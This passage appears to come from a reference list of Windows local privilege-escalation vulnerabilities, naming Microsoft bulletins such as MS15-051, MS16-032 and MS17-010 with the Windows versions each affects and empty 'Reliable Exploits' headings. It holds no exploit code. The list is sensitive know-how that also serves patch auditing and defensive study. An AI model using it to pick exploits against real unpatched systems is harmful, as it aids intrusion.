  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems

MS15-051 "ClientCopyImage"

Affected Versions

  • Windows Server 2003 Service Pack 2
  • Windows Server 2003 x64 Edition Service Pack 2
  • Windows Server 2003 with SP2 for Itanium-based Systems
  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8 for 32-bit Systems
  • Windows 8 for x64-based Systems
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT[1] (3045171)
  • Windows RT 8.1[1] (3045171)

Reliable Exploits

MS16-014 "wmi recv notif"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT 8.1[1] (3126587)
  • Windows RT 8.1[1] (3126593)
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems

MS16-016 "mrxdav.sys"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

Reliable Exploits

MS16-032 "secondary logon"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT 8.1 [1] (3139914)
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems

Reliable Exploits

MS16-098 "RGNOBJ"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows RT 8.1[1] (3177725)
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems
  • Windows 10 Version 1607 for 32-bit Systems
  • Windows 10 Version 1607 for x64-based Systems

MS16-135 "NtSetWindowLongPtr"

Affected Versions

  • Windows Vista Service Pack 2
  • Windows Vista x64 Edition Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for Itanium-based Systems Service Pack 2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for Itanium-based Systems Service Pack 1
  • Windows 8.1 for 32-bit Systems
  • Windows 8.1 for x64-based Systems
  • Windows Server 2012
  • Windows Server 2012 R2
  • Windows 10 for 32-bit Systems
  • Windows 10 for x64-based Systems
  • Windows 10 Version 1511 for 32-bit Systems
  • Windows 10 Version 1511 for x64-based Systems
  • Windows Server 2016 for x64-based Systems

Reliable Exploits

MS17-010 "Eternal Blue"

Affected Versions

Reliable Exploits